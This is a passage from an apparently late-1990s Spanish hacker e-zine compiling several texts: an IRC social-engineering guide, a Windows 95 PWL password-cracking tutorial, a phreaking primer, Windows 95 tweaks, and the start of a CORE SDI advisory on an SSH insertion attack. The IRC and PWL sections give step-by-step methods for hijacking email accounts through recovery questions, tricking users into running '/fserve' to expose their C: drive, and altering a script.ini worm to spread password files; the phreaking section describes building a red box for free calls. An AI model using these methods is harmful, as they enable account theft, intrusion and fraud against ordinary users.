hablador, aqui esta su mayor punto debil. Hablan y la mayoria de las veces
lo hacen demasiado, aqui es donde entras tu.
Desde luego si al tio (por muy tonto que sea), le entras diciendole lo
tipico de: "oye veras esque se me a jodido un archivo del G¸indows, y queria
saber si me podias pasar el tuyo, es un archivo que esta en la carpeta de
windows, tiene de extension .pwl", el tio lo mas probable es que desconfie y
o te ignore, o que te diga que usa el "Nt".
Tienes que usar todo tu ingenio y astucia para hacerte "colegilla"
sullo. Lo primero que debes hacer es ponerte otro nick que no vallas a usar
nada mas que cuando vallas a hablar con el, ademas para que sea mas creible
este nick estaria bien que fuese algo normal como: latino, juan y cosas asi.
No te pongas El_Se—oR_dEl_dEsAsTrE, por que lo mas probabla es que te
mande a freir monas. Entra en canales donde habitualmente la gente no sea
muy experta en ordenadores,como #sexo o #fotoxXx, aqui es donde la gente
mas se enrolla y es de donde puedes sacar mas probecho de tu tiempo.
Lo siguiente es usar algo de "ingenieria social". si le entras al tio
como te he dicho antes no te hara ni caso, lo mejor que puedes hacer es, por
ejemplo si estas en un canal de fotoxXx intentar conseguir el pass y el
logging de alguna pagina porno yaque en esta clase de canales hay muchas
personas que son socias de alguna pagina X.
por ejemplo digamos que has localizado a un tio que crees que pueda
ser socio de la pagina depago del Play Boy, un ejemplo de como conseguir su
pass y su loggin seria esta conversacion en un chat privado: (tu heres juan
y el pepe)
->juan: oye he estado viendo las fotos que me has cambiado y me he dado
cuenta de que hay muchas del Play Boy ®de donde las has sacado?
->pepe: de la pagina
->juan: ®heres socio?
->pepe: si
->juan: joder pues tienes que tenr mogollon de pelas, por que eso tiene que
salir caro ®no?
->pepe: no te creas solo cobran 25$ al mes
->juan: hombre barato, barato, no es... ®que tuviste que hacer para hacerte
socio?
->pepe: pues poca cosa, rellene un formulario de inscripcion y a los dos
dias ya tenia mi clave y mi nombre de usuario
->juan: a mi hace unos dias me dieron un nombre y una clave, pero ya no
funcionaba
->pepe: es posible, los cambian cada 2 semanas
aqui ya te has enterado de que las claves de acceso a la pagina de
socios del Play Boy las cambian cada 2 semanas
->juan: ®y como os las comunican por e-mail?
->pepe: si
ahora lo que tienes que conseguir es que te de su direccion de e-mail,
si tienes suerte a donde se lo manden sera a un servicio de e-mail gratuito
tipo "latinmail". Esto pasa asi la mayoria de las veces debido a que el
correo tambien lo use su padre, y no creo que le agrade ver como su hijo se
gasta la paga en pagar un acceso a una pagina pornografica. La mayoria de
los servicios gratuitos de e-mail disponen de un servicio extra de
"recordatorio de contraseñas" a la que puedes acceder si pones la direccion
de e-mail (pepe@latinmail.com por ejemplo), y su grupo preferido de musica.
En estos casos mientras estas hablando con el lo mejor que puedes
hacer escuando te de su direccion de e-mail, visita su servidor y veras si
la direccion de e-mail es de uno de estos servios gratuitos. Si no es asi
intenta sonsacarle a que direccion de e-mail le mandan los passwords.
Pongamos que se lo mandan a la cuenta "pepe@latinmail.com" y que ese
servicio de e-mail gratuito pone a disposicion de los usuarios el
"recordatorio de contraseña".
Hazte una cuenta en ese servidor para ver si ofrece ese servicio o no
lo ofrece. Si lo hace (que sera lo mas probable), mira las opcion es que te
da para recordarte la contraseña. Pongamos que te dan las opciones: "tu
grupo de musica favorito", "la marca de yogures que compra tu madre" y "el
nombre de tu discoteca favorita", vale ahora lo que tienes que hacer es,
averiguar todas esas cosas que te dan opcion a recordar la contraseña de el.
Una vez que lo hayas logrado intenta entrar en su cuenta de e-mail y
si lo logras (que sera lo mas probable), intenta averiguar mas o menos
sobre que dia le mandan los passwords, y listo a entrar en su cuenta de
e-mail los dias que se las manden, y copiar el loggin y el password, pero
ojo, no le borres los mensajes que le llegen con los passwords o se olera
que alguien los a pillado y cambiara su cuenta de e-mail.
Otra de las cosas que se pueden conseguir en el Irc, son los ya
famosos ".pwl", que guardan las contraseñas del G¸indows, esto ultimamente
se a convertido en algo dicifil de conseguir por que ya lo sabe todo el
mundo pero prueba por si acaso.
Pero claro un .pwl, si no lo "descompilas" y lo pasas a codigo
"legible" no te vale para nada. Ahorate voy a enseñar como conseguir usar
el ".pwl", que con tanto esfuerzo has conseguido sacarle a un pive que se
conectaba desde una universidad (por ejemplo) (si heres universitario,
estas de suerte. Pilla todos los ".pwl" que puedas de los ordenadores que
esten conectados a una red o no, y a disfrutar cambiandote las notas o
pillando el examen que tienes la semana que viene)
Bueno supongo que ya tienes el .pwl del ordenador de tu universidad
objetivo, bien ahora te estaras preguntando "®y que coño hago yo con esto?",
pos te lo explico ahora mismo :) .
Lo primero que tienes que hacer es copiar las d.n.s de la universidad
(o de donde sea el pwl) por que si no de poco te va a servir desencriptarlo.
Vale supongo que ya tienes todo lo necesario de momento, osea el pwl,
y las d.n.s. Bien ahora lo que tienes que hacer es lo sieguiente.
La parte del texto que aqui se expone la ha hecho ToMaCHeLi y la voy
a poner literalmente, tambien puedes bajarte el texto por separado en la
pagina del HaCk`S-wEb-RiNg http://come.to/HaCkS-wEb-RiNg
------------------------------------------------------------------------------
@@@@@@@@@
By ToMaCHeLi @ PWL's @ By ToMaCHeLi
@@@@@@@@@
------------------------------------------------------------------------------
1.- Introduccion.
2.- Que son?.
3.- Como conseguirlos.
4.- Como desencriptarlos.
------------------------------------------------------------------------------
1.- Introduccion:
-----------------
Bueno ante todo me he decidido a escribir este articulo para que
veais la gran seguridad que tiene Windows 95 (ventanucos pa los amigos).
Asi es que piensate antes de ponerte el Windows 98 (mas de lo mismo
seguro).
2.- Que son?:
-------------
Los PWL's son archivos donde Windows 95 guarda todas las contraseñas
del sistema (eso si para que queden almacenadas debes seleccionar el cuadro
donde pone "Guardar contraseña"). Ejemplos pueden ser la contraseña de
entrada a Windows 95, contraseña de entrada a una carpeta compartida en una
red LAN, y algunas mas. Pero lo que mucha gente no sabe es que la propia
contraseña de entrada a INTERNET se guarda en este archivo, incluido
tambien el nombre de usuario.
3.- Como conseguirlos:
----------------------
Si sigues leyendo esto veo que te interesa, jeje. Estos archivos se
encuentran en el directorio principal de Windows 95 que normalmente sera
c:\windows. Para empezar a practicar un poco puedes coger tus propios PWL
que tendras en el directorio antes mencionado, y si quieres arriesgarte un
poco mas puedes intentar conseguir PWL's de otras maquinas.
Si tienes acceso al ordenata de la universidad donde estudias, de un
conocido (no amigo, que eso esta mu mal), de una feria de ordenatas, etc..
pos nada chico pilla los PWL (pero que no te pillen pillandos jeje, Ah! y
esto yo no te lo he dicho) ;). Tambien puedes intentarlo por el IRC mediante
ingenieria social (que no sabes lo que es????, ®que haces leyendo esto tio?
dejalo ya...) u otras tecnicas que sepas...
4.- Como desencriptarlos:
-------------------------
Asi que ya tienes los archivitos eh?, entonces manos a la obra. Las
maneras de desencriptarlos son diversas pero la mas facil que he encontrado
es utilizando un par de herramientas destinadas para ello. Estas
herramientas son el GLIDE y el PWLTOOL (cada una de ellas tiene sus
ventajas e inconvenientes). Para usarlas yo recomiendo lo siguiente:
Supongamos que tenemos el archivo Tom.pwl Lo primero que haria seria
utilizar el GLIDE para ver si dentro de este archivo hay passwords para
ello deberia verse algo asi al final del archivo:
Recource[5] (2)
Recource[6] (2)
Recource[7] (2)
Recource[8] (2)
Recource[9] (2)
Recource[10] (50)
0 -3*Rna\Servicom\a3004773@servicomA2D41B37
Recource[11] (2)
Recource[12] (2)
Recource[13] (54)
2 $ Todo -0e≠y√›ñÆ—˘ OIOIgADMIN
Recource[14] (2)
Recource[15] (2)
(Esos simbolos raros quieren decir que aqui existen passwords).
Aqui lo importante seria:
-------------------------
Nombre de usuario: a3004773@servicom
Password: A2D41B37
(Esto es la conexion a INTERNET a traves de Servicom)
(NO es verdadera por supuesto) :)
------------------------------------------------------------------------------
Si no existen passwords en el archivo (que tambien puede ser) se
veria asi: (si te sale esto tira a la papelera el PWL) :))
Recource[5] (2)
Recource[6] (2)
Recource[7] (2)
Recource[8] (2)
Recource[9] (2)
Recource[10] (50)
Recource[11] (2)
Recource[12] (2)
Recource[13] (54)
Recource[14] (2)
Recource[15] (2)
(aqui no hay passwords).
Aqui lo importante seria:
-------------------------
NADA NADA NADA NADA NADA NADA NADA NADA NADA Y NADA
-----------------------------------------------------------------------------
Y te preguntaras, si ya aparece la password de INTERNET y el nombre
de usuario con el GLIDE pa que usar el PWLTOOL????. Te explico, tengo
comprobado que cuando la password de INTERNET supera los 8 digitos a partir
del digito 8 ya no apareceran los restantes (joer explicate). Por ejemplo:
Password verdadero : 795342A3B5
Password que aparece con el GLIDE: 795342A3
(fijate falta el B5)
Pues este es el inconveniente que tiene el GLIDE y por eso se utiliza
el PWLTOOL.
Pero con este hay otro pequeño inconveniente, resulta que para que
salgan todos los password que hay dentro del PWL se necesita el password de
entrada a Windows 95 (joer que lio).
Ejemplo, tenemos el archivo Toma.pwl, este archivo debes ponerlo en
el directorio de windows del ordenata de tu casa por ejemplo, despues
reinicias el equipo para que te pida contraseña de entrada al equipo (esto
activalo en el panel de control-contraseñas), cuando te pida el nombre de
usuario pon Toma (se me olvidava en los PWL el nombre del archivo es siempre
el nombre del usuario, ejemplo Toma.pwl Nombre de usuario: Toma).
Ahora viene lo malo, sabes la contraseña de ese nombre de usuario??,
si la sabes la pones y ya esta entras en Windows 95 ejecutas el PWLTOOL y ..
TACHAN!!! todas las passwords que contiene el PWL te seran desveladas sin
el inconveniente que tiene el GLIDE (lo de los 8 digitos, recuerdas??).
(Pa los que no tienen la contraseña del nombre de usuario de windows)
Pero y si no sabes la contraseña de entrada a Windows con ese nombre
de usuario??
Arggg, eso se complica, entonces deberas usar el PWLTOOL en el que
una de sus opciones es la de utilizar un diccionario de palabras para sacar
la contraseña del nombre de usuario del archivo PWL (y esto no es facil...,
pero se puede conseguir).
Tambien puedes pensar otras maneras de utilizar el PWLTOOL pero eso
te lo dejo a ti no te voy a decir todo macho (o gachi lo que seas, una gachi
hacker??, que raro no hay muchas...).
Por mi parte es todo, espero que os haya servido de ayuda todo este
rollo. Si algunno quiere añadir o corregir algo que me avise.
******************************************************************************
Este articulo es de libre distribucion (siempre que no modifiques
nada, o te buscare hasta la muerte jeje), ademas no me hago responsable de
lo que puedas llegar a cometer con su contenido.
******************************************************************************
Articulo realizado para el grupo Hack's-Web-Ring.
Realizado por:
--- ToMaCHeLi ---
WEB: http://members.tripod.com/~tomacheli
MAIL: tomacheli@geocities.com
Un saludo pa todos los del grupo :)
-----------------fin del texto escrito por ToMaCHeLi--------------------------
bien despues de esto supongo que estras deseando entrar en el Irc y
empezar a actuar, pero antes de hacer eso te recomiendo que sigas leyendo
por que voy a pasar a explicarte algunos trucos quete facilitaran la vida
en el Irc.
Muchas veces lo de la ingenieria social no funciona y pillar un pwl
apartir de este metodo se esta convirtiendo cada dia mas dificil, pero
existe un comando que te puede facilitar las cosas por que no todo el mundo
lo conoce (y sobre todo los novatos) el comando en cuestion es el
siguiente: /fserve el_nick_que_uses 5 c:\
si haces que un usuario ponga este comando en el canal, privado,
Dcc-chat.... lo que hara este comando es darte acceso a su unidad c:\, el
pequeño inconveniente que tiene esto es que el pive antes de darte acceso
le saldra un mensage que le dira que te va a dar acceso a su unidad c:\, el
mensage en cuestion sale en ingles, osea que si tienes suerte y el pive no
controla mucho ingles, pasara de leer el mensage y aceptara sin pedirte
ninguna explicacion.
Seguro que has oido hablar del archiconocido "virus" del "script.ini"
como sabras este "virus" lo que hace es que cuando entras en un canal
enviasa todos los alli presentes este archivo, pero.... ®has probado a
modificar este "ini" para que envez de mandar el "script.ini", mande el
"c:\windows\*.pwl"? investiga que esto puede ser muy interesante.
Otra opcion que tienes si tienes algo de idea de "scripting" es
modificar la parte del fserver del script que uses para que envez de que
cuando te den acceso a un fserver en la carpeta que ellos elijan te lo den
en "c:\" o en "c:\windows", esto no se de que manera se puede hacer,
pero me han dicho que si se puede,osea que andaros al loro y echad un
vistazo de vez encuando a las personas que esten en vustro fserver, para ver
por donde andan y lo que se estan bajando.
pues eso es todo, si tienes alguna duda, sugerencia o simplemente
quieres decirme algo referente a este texto, puedes hacerlo escribiendo a:
zed@mixmail.com
!!feliz irc-hack a todos≠≠
<---------------------------------------------------------------------------->
€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€
<---------------------------------------------------------------------------->
ZeD no se hace responsable de las consecuencias que te pueden suceder
si usas mal cualquier informacion aqui dada, pero te recomienda que no uses
nada de lo aqui escrito (por tu bien)
puedes subir este texto a tu web, bbs o distribuirlo de la manera que
te de la gana siempre y cuando mantengas este encabezado, no alteres ninguna
parte del texto y me avises antes a zed@mixmail.com
------------------------------------------------------------------------------
##############################################
# PHREACKING PARA NOVATOS #
##############################################
por ZeD---http://www.angelfire.com/ak/HACKZED/ZED2.html
---http://come.to/HaCkS-wEb-RiNg
(miembro del HaCk`S-wEb-RiNg)
1.®que es phreackear?
2.®por que phreackear?
3.reglas
4.®como empezar en esto del phreacking?
5.descripcion brebe de las BOXES
6.RED-BOXING
7.despedida y cierre
------------------------------------------------------------------------------
1. ®QUE ES PHREACKEAR?
phreackear es simplemente hacer cualquier tipo de llamadas
(provinciales, internacionales) completamente sin pagar un duro, tener un
conocimento + o - completo de la red de telefonia y de que se puede hacer
con ella, como usar determidas cosas para no pagar un servicio que deveria
ser mucho mas barato, ya que es algo que se ha convertido en algo
INPRESCINDIBLE.
2. ®POR QUE PHREACKEAR?
la explicacion es muy simple,piensalo de esta manera: ®por que tengo
que pagar una factura que cada dia es mas elevada por usar un SERVICIO de
maxima NECESIDAD? ®por ademas de ahorrar pagar la luz el agua...etc... que
tambien son SERVICIOS de maxima NECESIDAD, tambien lo tengo que hacer para
pagar el telefono? pues por una razon muy simple, las compañias telefonicas
abusan de los consumidores que usan un SERVICIO cobrandoles mucho mas de lo
que deveria costar, solo por que es NECESARIO, ademas, ellos nos engañan
con "PLANES CLAROS" y demas jilipolleces que luego siempre son mentira, ®por
que no les vas a poder engañar tu a ellos tambien?
3. REGLAS DEL PHREACKING
como en todo, aqui tambien hay que seguir unas reglas, que mas que
PENALES, son MORALES.
1- no uses nunca una BOX con tu propia linea telefonica (seria de tontos
hacerlo)
2- no hablar de tus proyectos phreackers por telefono (lo mismo de arriba)
3- no uses tu nombre real cuando estes haciendo phreack (no tengo que
decirtelo ®verdad?)
4- todos los materiales que uses debes guardarlos en buen sitio, no es
conveniente que vallas dejando las cosas por hay tiradas para que la
gente las vea
5- (y aunque se contradiga con la primera) no es bueno joder a otra persona,
que como tu esta siendo abusado por una compañia telefonica, intenta usar
siempre lineas de empresas multimillonarias o cosas asi (aunque esto
conlleva un mayor riesgo claro)
4. ®COMO EMPEZAR EN ESTO DEL PHREACKING?
lo primero que tienes que hacer es construir los BOXES que vallas a
usar en tus "sesiones" de todas maneras si tienes problemas al construirlos
siempre hay otras alternativas... ;-) para empezar a phreackear lo que
tienes que hacer es elejir bien los sitios donde lo vallas a hacer, como
heres nuevo en esto, tardaras algo mas de tiempo que uno que ya controla
del tema por lo tanto te recomiendo que uses sitios poco transitados y que
lo hagas siempre de noche.
5. DESCRIPCION DE LAS BOXES
nombre de la BOX UTILIDAD
--------------------- ----------------
RED-BOX-------------------genera tonos para llamadas gratis
BLACK-BOX-----------------cuando se llama,el que llama no paga un duro
BEIGE-BOX-----------------llamas con la linea de otra persona(la unica que
funciona en españa)
GREEN-BOX-----------------genera tonos de llamada a cobro revertido
CHEES-BOX-----------------cambia tu telefono a modo "cabina telefonica"
ACRILIC-BOX---------------roba 3 vias de linea
WATER-BOX-----------------detine el rastreo de la policia
BOX-LANZAMIENTO-----------amplificador para el microfono del telefono
BOX-BORRON(near)----------corta todas las lineas de tu area
MAROON-BOX----------------crea una "party line"
BOX-BROTE-----------------llama a los telefonos de tus vecinos
CHROME-BOX----------------manipula las señales de trafico
BOX-CLARA-----------------llamdas gratis
COLOR-BOX-----------------graba las conversaciones telefonicas
BOX DE COBRE--------------causa interferencias entre dos lineas que se esten
usando
INFINITE-BOX--------------telefono de uso remoto
BOX-ARCO IRIRIS-----------corta cualquier rastreo en la linea
existen mas boxes pero estas son las mas interesantes.
6. RED-BOXING
aqui te voy a explicar como hacer una red-box: lo primero que tienes
que hacer es ir a tienda de radio y comprar un dialer que sea de tonos (un
marcador de tonos valla) y un cristal de 6,5536 Mhz abre el marcador y
quita el cristal que lleva, ahora mete el de 6,5536 Mhz (el que has
comprado tu) cierras el marcador y EVOILA ya tienes tu red-box.
estos es muy bonito ®pero como lo uso ahora? te estaras preguntando
(joder que impacientes sois) para hacerlo funcionar tienes que hacer lo
siguiente: cuando te pidan 25pts para la llamada en el marcador tienes que
pulsar "5*'s" por ejemplo (sin las comillas obviamente) cuando son 5pts
"1*." cuando son 10pts hay que marcar "3*'s" y asi ®a que no es dificil?
7. DESPEDIDA Y CIERRE
bueno pues esto es todo espero que esto te aya servido de referencia
si estas empezando en esto del phreacking y si ya eres un entendido para
recordarte algo que se te avia olvidado, en fin que me aya tirado 15
minutos, para que valga de algo joñe
bueno si me quereis comentar algo ya sabeis que podeis escribirme a
zed@mixmail.com y que todo lo que he dicho a qui no es mas que una guia
para que aprendas, pero no para que uses lo que aprendas 8-), pero si lo
haces....aya tu bye
<---------------------------------------------------------------------------->
€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€
<---------------------------------------------------------------------------->
############################################
# como trucar el G¸indows95 #
############################################
texto escrito por ZeD--www.angelfire.com/ak/HACKZED/ZED2.html
--http://come.to/HaCkS-wEb-RiNg
puedes subir este texto a tu web,bbs,ftp o lo que sea,siempre que mantengas
este encabezado.
ACTUALIZACION:10/8/98
ZeD no se hace responsable de los daños que el uso de este documento
pueda ocasionar a tu pc y te recomienda siempre hacer copias de seguridad
(por si las moscas)
INDICE:
1.como trucar el internet explorer
2.pon el nombre que quieras a la papelera de reciclaje
3.cambia el icono de las carpetas por el que tu quieras
4.interface de 3.11 en w95
5.crear un acceseo directo para apagar el pc
6.cambiar el nombre de "mi pc"
7.MS2.sys
8.utilidades del sistema
9.PROXImamente
------------------------------------------------------------------------------
1.COMO TRUCAR EL INTERNET-EXPLORER v3.1 en adelante
simpre has querido cambiar el dibujio de la "E" que sale cuando estas
navegando con el internet-explorer, pues es bien simple.
La imagen que sale es un archivo ".bmp" que esta en la carpeta
..../internet explorer/ son los archivos que se llaman "Ani38.bmp" y
"Ani26.bmp" abrelos y mira como son. Veras que son como una tira que segun
la vas bajando se convierte en una animacion. Vale pues ahora crea tu logo
tal como esta definido en los archivos cambialo y ya tienes el explorer
trucado (puedes bajarte algunas imagenes de mi pagina que esta en:
www.angelfire.com/ak/HACKZED/ZED2.html,en la seccion "download")
2.COMO CAMBIAR EL NOMBRE A LA PAPELERA DE RECICLAJE
cambiar el nombre de la papelera de reciclaje es muy simple: cambia
el nombre en la clave del "regedit":(esta en la carpeta "windows")
HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E
3.CAMBIAR EL ICONO DE LAS CARPETAS POR EL QUE TU QUIERAS
para cambiar el icono que representa las carpetas tienes que hacer lo
siguiente: Muchos de los iconos que por defecto traen algunos archivos se
pueden cambiar simplemente desde cualquier carpeta, mediante el menu ver,
luego opciones... , tipos de arhivos y por ultimo editar, e inmediatamente
despues selecionar cambiar icono. Pero esto no siempre nos vale, sobre todo
si queremos cambiar los iconos de por ejemplo, las carpetas, el menu de
Inicio...
Para ello el truco es el siguiente: Lo primero que tenemos que hacer
es saber el icono que queremos cambiar... por ejemplo, para cambiar el
icono de las carpetas, debemos ejecutar el registro, irnos a la seccion
HKEY_CLASSES_ROOT\Folder\DefaultIcon en la parte derecha aparecera
(preterminado) "C:\WINDOWS\SYSTEM\shell32.dll,3", la primera idea.. que no
funciona :) es ir y cambiar directamente el valor de la cadena para poner
el icono que queremos. Pero lo que tenemos que hacer es ir a la seccion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ explorer y
crear una nueva clave, Shell Icons, despues creamos un nuevo valor de la
cadena, con el numero del icono indicado en el DefaultIcon que queremos
cambiar, en nuestro caso el 3, seleccionamos este valor, pulsamos 2 veces y
en Informacion del valor introducimos el path del archivo que tiene el
icono que queremos poner, con su numero correspondiente. En mi caso es:
nombre | datos
(predeterminado) (valor no establecido)
3 "c\iconos\folders.icl,70"
Bueno.. ya hemos hecho lo mas dificil. Pero aun queda algo mas.
Windows 95 guarda una cache de Iconos en el directorio de instalacion del
95, llamado ShellIconCache, este archivo esta oculto. Debemos de borrar
este archivo para que los cambios surjan efecto, pero hay que borrarlo
fuera de la sesion de Windows.. osea.. que hay que reiniciar en modo MS-DOS,
quitar los atributos al archivo (en MSDOS este se llama shelli~1), borrarlo
y reiniciar el entorno grafico (hoy en dia llamado sistema operativo.. :P)
y ya esta, tenemos nuestro icono favorito como icono de carpeta.. :) De
igual manera con el resto de los iconos del 95.
PD: Importante, si tenemos la utilidad TWEAK UI de las Powertoys de
Microchof (si, MICROCHOF... ) podemos borrar el cache de iconos desde la
pestaña Repair, con el boton Rebuid Icons. Y si tenemos el MicroAngelo..
todo esto nos lo hace ese fantastico programa.. pero conviene saber hacer
las cosas "a pelo".
4.INTERFACE DEL W3.11 EN EL W95
este es bastante mas simple que el anterior, lo que tienes que hacer
es lo siguiente:
1- edita el archivo "SYSTEM.INI" (directorio de windows)
2- en la seccion "BOOT", busca la linea que pone "SHELL=EXPLORER.EXE"
3- cambia lo de "EXPLORER.EXE" por "PROGMAN.EXE"
4- reinicia el pc y listo.
5.ACCESO DIRECTO PARA APAGAR EL PC
esto es de lo mas simple, haz lo siguiente: crea una cceso directo en
el escritori,vete a propiedades y en loreferente a acceso direco busca
"DESTINO".alli pones lo siguiente:
C:\WINDOWS\RUNDLL32.EXE user.exe,ExitWindows le das a aplicar, acetar y ya
esta.
6.cambiar el nombre de "MI PC"
para hacer esot tienes que seguir los siguientes pasos: vete al
"REGEDIT" cambia la clave::
HKEY_CLASSES_ROOT\CLSID\{2OD04FE0-3AEA-1069-A2D8-08002B30309D} pon el
nombre quele quieras poner a "MI PC" y ya esta.
7.MS2.sys
lo primero que tienes que hacer es localzar este archivo, una vez
encontrado, para poder editarlo tendras que cambiar sus atributos.
una vez puedas editarlo, dirijete a la parte de "OPTIONS":
[Options]
BootDelay = 0 Aumenta la velocidad de booteo,el mensaje "Starting Windows.."
no aparece.
BootMenu = 1 Despliega automaticamente el menu de arranque de WIndows 95.
BootMenuDefault = 1 El numero de opcion por default.
BootMenuDelay = 10 Numero de segundos que el menu de inicio es desplegado.
Logo = 0 No despliega la imagen del logo de arranque de Win95.
BootMulti = 1 Hace disponible un doble booteo con DOS.
8.UTILES DEL SISTEMA
el w95 trae algunas erramientas que te permitiran hacer cosillas
(algo basicas) muy interesantes para ir empezando, aqui te voy a explicar el
funcionamiento de dos de ellas el Telnet, un viejo amigo que ya conoce todo
el mundo y el Ftp, si si, has leido bien el 95 (bueno en realidad el MS2)
trae una version bastante simple (pero util) de programa FTP.
TELNET.
en la carpeta windows (o como la ayas llamado) hay un .exe que se
llama Telnet, este programa sirve para hacer conexiones desde tu sistema a
otro remoto a traves de una red (internet principalmente), en lo que
consiste basicamente este programa es en acceder a unos determinados
puesrtos de un sistema remoto en los cuales puedes hacer varias cosas, como
por ejm: bajarte el correo,mirar el directorio de una web.....
aqui te expongo una lista de los puertos con una descripcion de para
lo que vale cada uno de ellos: (el numero que aparece entre parentesis es
el puerto)
auth (113)
conference (531)
courier (530)
daytime (13)
discard (9)
domain (53)
echo (7)
efs (520)
exec (512)
finger (79)
ftp (21)
gopher (70)
hostnames (101)
http (80)
ingreslock (1524)
link (87)
login (513)
mtp (57)
nameserver (42)
netbios (139)
netnews (532)
netstat (15)
nntp (119)
pop2 (109)
pop3 (110)
proxy (8080)
qotd (17)
remotefs (556)
rje (77)
sftp (115)
shell (514)
smtp (25)
spooler (515)
sunrpc (111)
supdup (95)
systat (11)
telnet (23)
tempo (526)
tftp (69)
time (37)
uucp (540)
uucp-path (117)
whois (43)
www (80)
®como se hace un Telnet?
pues hacerlo es muy simple:
si nos proporcionan la direccion telnet "maquina.remota.es 2010"
hariamos lo siguiente: (puede variar segun sistemas):
* Tecleamos en la linea de comandos "TELNET maquina.remota.es 2010" (En
otros sistemas teclearemos "TELNET" y despuÈs "OPEN maquina.remota.es
2010" ) con lo que veremos algo parecido a esto:
* telnet MAQUINA.REMOTA.ES 2010
* Trying 130.132.21.53 Port 2010 ...
* Connected to MAQUINA.REMOTA.ES
* Escape character is ...
* Esto nos dice mas o menos que esta intentando conectar con la direccion,
nos devuelve la direccion IP, se conecta, y nos dice cual es el "caracter
escape".
* Una vez hemos conectado se nos pide un "login" y/o "password" para entrar
a la maquina remota. En algunos casos podremos conectar a la maquina
remota con el login "guest" (invitado) pero la mayoria de las veces
deberemos saber el login antes de conectarnos.
* El siguiente paso es configurar la emulacion de terminal, es decir,
decirle al sitio remoto como queremos que nos muestre los datos en
nuestra pantalla. La configuracion mas comun es la VT100, que es la
estandar para las comunicaciones basadas en terminales. (algunos clientes
telnet configuran ellos la emulacion).
* El ultimo paso (despues de haber utilizado el servicio es salir ;-) Como
las pulsaciones de tecla no las hacemos "realmente" en nuestra maquina,
sino en la maquina remota, necesitamos el "caracter escape" que se nos
dia al conectar para pasar al "modo comando" ( habitualmente teclas
control + parentesis derecho ).
Comandos disponibles:
CLOSE Termina la conexion TELNET con la maquina remota y vuelve al
"modo comando" (si empezamos alli) o sale de TELNET.
QUIT Sale del programa TELNET; si estas conectado a una maquina
remota, QUIT te desconecta y luego sale de TELNET.
SET ECHO Si no ves lo que estas escribiendo, o si escribes y ves doble,
este comando soluciona el problema.
OPEN Abre una conexion a una maquina remota.
ATENCION: Al presionar las teclas Enter o Return, sales del modo
comando TELNET y vuelves a la sesion TELNET. te dejo aqui, investiga y
juega con telnet, no es muy dificil y pronto aprenderas a usarlo de una
manera mas "productiva".
FTP-MS2
si entras en Ms2 y en el promp pones "ftp" te saldra esto "ftp>"
ahora parasaber los comandos que puedes usar pon "?" y te saldra una lista
de los comandos que puedes usar en el programa, juega con ellos y prueba
cosas
9.PROXImamente....
pues la verdad es que no se que voy a incluir, si tienes algo que
comentar o quieres mandarme cosas nuevas ya sabes mandamelas a
zed@mixmail.com y sera incluido en la proxima actualizacion
bye--:)
<---------------------------------------------------------------------------->
€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€
<---------------------------------------------------------------------------->
CORE SDI S.A.
Buenos Aires, Argentina
<http://www.core-sdi.com>
Advertencia de Seguridad
11 de Junio de 1998
Ataque de insercion a SSH
Esta advertencia trata sobre un problema de seguridad presente
en el paquete de software SSH que permite a un atacante ejecutar
comandos arbitrarios en el servidor SSH o, de manera mas general,
insertar datos arbitrarios en un canal SSH encriptado.
Descripcion del problema
~~~~~~~~~~~~~~~~~~~~~~~~
SSH (Secure Shell) es un programa que proporciona autenticacion
fuerte y comunicaciones seguras sobre canales inseguros.
Es ampliamente usado para sesiones interactivas remotas, transferencia
de archivos y encapsulado de otros protocolos en un tunel
sobre un canal de comunicacions encriptado.
Todas las comunicaciones son encriptadas automaticamente y
de manera transparente.
La encripcion es tambien utilizada para realizar chequeo de la
integridad de los datos, sin embargo implementaciones actuales
se basan en un Chequeo Ciclico de Redundancia de 32 bits (CRC-32)
para verificar la integridad despues de la desencripcion de un
paquete SSH recibido.
La encripcion se realiza utilizando uno de los algoritmos soportados
tanto por el cliente como el servidor.
Una vez establecida una conexion entre cliente y servidor, ambos
realizan un protocolo de negociacion que incluye autenticacion
mutua, eleccion de un algoritmo criptografico a utilizar e
intercambio de una clave de sesion a utilizar con dicho algoritmo.
Terminada la negociacion se activa la encripcion, todo comunicacion
subsiguiente esta encriptada.
Los algoritmos de encripcion soportados por la version actual de SSH son:
- Blowfish
Encriptor de bloque de Bruce Schneier con clave de 128 bits.
- IDEA
Encriptor de bloque con clave de 128 bits.
- DES
Data Encrryption Standard, encriptor de bloque con clave de 56 bits
- Triple DES (3DES)
Version triple de DES con tres claves para un total efectivo
de 112 bits de clave.
- ARCFOUR
Encriptor de canal compatible con RC4 con clave 128 bits
El uso de estos algoritmos en modo CBC (Cipher Block Chaining)
o CFB ( Cipher FeedBack 64 bits) en conjuncion con CRC-32 para
realizar chequeo de integridad posibilita un ataque de
texto conocido (known plaintext attack) con tan solo
16 bytes de texto conocido (8 para el caso de IDEA en modo
CFB) que permite a un atacante insertar paquetes encriptados
en el canal de comunicacion entre cliente y servidor que
pasaran las pruebas de integridad y se desencriptaran a
el texto en claro enviado. De esta manera, un atacante
podra ejecutar comandos arbitrarios en el servidor.
El mismo ataque puede realizarse sobre el cliente, aunque
solo hace posible el envio de datos arbitrarios a la terminal
del cliente. Las implicacias de un ataque al cliente son
tal vez no tan como un ataque al servidor pero aun asi deben
ser consideradas durante el proceso de solucion del problema.
Detalles tecnicos
~~~~~~~~~~~~~~~~~
Despues de la fase de identificacion del protocolo, donde
el servidor envia un string de texto en claro especificando
su version de protocolo y de software, toda la comunicacion se
realiza encapsulando los datos en un formato de paquetes descripto
como "The Binary Packet Protocol" [1]
Se indica dicho formato a continuacion:
32 24 16 8 0
+----------+---------+---------+---------+
| data length (bytes) |
+----------+---------+---------+---------+
| de 1 a 8 bytes de relleno |
= ( padding ) =
+----------+---------+---------+---------+
| type | |
+----------+ +
| |
= data =
| |
+----------+---------+---------+---------+
| CRC-32 |
+----------+---------+---------+---------+
Data length: Tamanio en bytes del paquete, sin incluir
el campo 'length' y los bytes de relleno.
Padding : 8 - (length mod 8) byte de datos aleatorios.
El uso de datos aleatorios al principio del
